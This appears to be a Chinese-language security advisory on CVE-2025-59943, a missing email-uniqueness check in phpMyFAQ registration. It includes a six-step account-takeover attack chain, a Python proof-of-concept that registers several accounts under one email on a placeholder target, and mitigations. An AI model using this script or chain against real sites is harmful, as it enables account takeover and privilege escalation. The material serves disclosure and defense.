CVE-2025-59943 phpMyFAQ邮箱唯一性校验缺失漏洞

漏洞信息

漏洞编号

CVE-2025-59943

漏洞类型

身份验证缺陷/邮箱唯一性绕过

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

phpMyFAQ

漏洞概述

phpMyFAQ是一款开源的FAQ（常见问题解答）Web应用程序，基于PHP和MySQL构建，为企业和组织提供知识管理和自助支持平台。CVE-2025-59943是phpMyFAQ中存在的一个高危安全漏洞，CVSS评分为8.1分。该漏洞源于用户注册流程中未对邮箱地址进行唯一性校验，导致攻击者可以使用相同的邮箱地址创建多个不同的账户。

由于邮箱地址在Web应用中通常被用作密码重置、通知发送和管理操作的身份标识符，这一缺陷将引发严重的账户歧义问题。在特定配置环境下，攻击者可以利用该漏洞实施权限提升或账户接管攻击。例如，攻击者可以通过注册与管理员相同邮箱的账户来干扰密码重置流程，或者利用邮箱唯一性缺失绕过基于邮箱的安全策略。该漏洞影响了phpMyFAQ 4.0-nightly-2025-10-03及以下所有版本，开发团队已在4.0.13版本中修复了此问题。该漏洞由GitHub安全顾问团队（[email protected]）发现并报告，于2025年10月3日正式披露。鉴于其网络可利用性且无需认证即可触发，属于高优先级修复的安全问题。

技术细节

phpMyFAQ的用户注册模块在处理新用户注册请求时，仅对用户名进行了唯一性检查，但未对邮箱地址字段施加数据库级别的唯一约束（UNIQUE constraint）或应用层的重复检测逻辑。正常情况下，用户注册流程应包含以下步骤：

1. 用户通过注册页面提交用户名、邮箱和密码等注册信息。
2. 系统应验证邮箱格式的有效性，并检查该邮箱是否已存在于数据库中。
3. 若邮箱已存在，则拒绝注册并提示用户使用其他邮箱。
4. 若邮箱不存在，则将新用户信息插入数据库。

然而，在存在漏洞的版本中，第2步的邮箱唯一性检查被完全跳过或存在逻辑缺陷，导致系统允许任意数量的账户使用相同的邮箱地址进行注册。这一缺陷的根因在于数据库表结构中users表的email字段缺少UNIQUE索引，以及注册处理代码（如register.php或对应的控制器）中缺少重复邮箱检测逻辑。

攻击者利用此漏洞的方式如下：首先，攻击者正常访问phpMyFAQ的注册页面，提交包含目标邮箱地址的注册请求。由于系统未进行唯一性校验，注册请求将被成功处理并创建新账户。攻击者可以重复此过程，使用相同邮箱创建任意数量的账户。随后，攻击者可以利用这些重复账户干扰密码重置流程——当合法用户请求密码重置时，系统可能将重置链接发送给攻击者控制的账户，从而实现账户接管。在管理员邮箱被复制的情况下，攻击者甚至可能获得管理权限。

攻击链分析

STEP 1

步骤1：信息收集

攻击者访问目标phpMyFAQ网站的注册页面，确认系统使用邮箱作为用户标识符，并了解注册流程的接口和参数。

STEP 2

步骤2：获取目标邮箱

通过公开信息、社交工程或数据泄露等方式获取目标用户的邮箱地址（特别是管理员或有权限用户的邮箱）。

STEP 3

步骤3：注册重复账户

使用获取到的目标邮箱地址，通过正常的注册流程创建新的phpMyFAQ账户。由于系统未校验邮箱唯一性，注册请求被成功处理。

STEP 4

步骤4：创建多个重复账户

重复步骤3，使用相同邮箱创建多个账户，建立对系统的持久化访问能力。

STEP 5

步骤5：触发密码重置

利用其中一个重复账户触发密码重置流程，或者等待合法用户触发密码重置，利用邮箱唯一性缺失导致的账户歧义干扰重置流程。

STEP 6

步骤6：账户接管/权限提升

通过密码重置接管合法用户账户，或利用管理员邮箱的重复账户获取管理权限，实现账户接管或权限提升。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-59943 PoC - phpMyFAQ Email Uniqueness Bypass # This PoC demonstrates registration of multiple accounts with the same email import requests TARGET_URL = "http://target-phpmyfaq.example.com" REGISTER_ENDPOINT = "/register.html" # Adjust path as needed # Common email used for all duplicate registrations TARGET_EMAIL = "[email protected]" # User accounts to create with the same email accounts = [ {"username": "attacker1", "email": TARGET_EMAIL, "password": "Pass1234!"}, {"username": "attacker2", "email": TARGET_EMAIL, "password": "Pass5678!"}, {"username": "attacker3", "email": TARGET_EMAIL, "password": "Pass9012!"}, ] session = requests.Session() for i, account in enumerate(accounts): print(f"[*] Attempting to register account {i+1} with email: {account['email']}") # Step 1: Fetch registration page to obtain CSRF token if needed resp = session.get(f"{TARGET_URL}{REGISTER_ENDPOINT}") # Extract CSRF token from the page (implementation depends on phpMyFAQ version) # csrf_token = re.search(r'name="csrf" value="([^"]+)"', resp.text).group(1) # Step 2: Submit registration form with duplicate email data = { "username": account["username"], "email": account["email"], "password": account["password"], "password_confirm": account["password"], # "csrf": csrf_token, # Include if CSRF protection is present } resp = session.post(f"{TARGET_URL}{REGISTER_ENDPOINT}", data=data) if "success" in resp.text.lower() or resp.status_code == 200: print(f"[+] Account {i+1} created successfully with duplicate email!") else: print(f"[-] Account {i+1} registration failed") print("[!] Vulnerability confirmed: Multiple accounts registered with the same email address")

影响范围

phpMyFAQ < 4.0.13

phpMyFAQ 4.0-nightly-2025-10-03及以下

防御指南

临时缓解措施

在无法立即升级到4.0.13版本的情况下，建议采取以下临时缓解措施：1）在数据库层面为users表的email字段手动添加UNIQUE索引，并清理已存在的重复邮箱记录；2）在注册接口的应用层代码中添加邮箱唯一性检查逻辑，阻止重复邮箱的注册请求；3）加强密码重置流程的安全性，例如在重置前要求用户回答安全问题或进行二次验证；4）监控和审计所有用户注册日志，及时发现并处理异常的重复邮箱注册行为；5）限制同一IP地址在短时间内的注册次数，防止大规模恶意注册。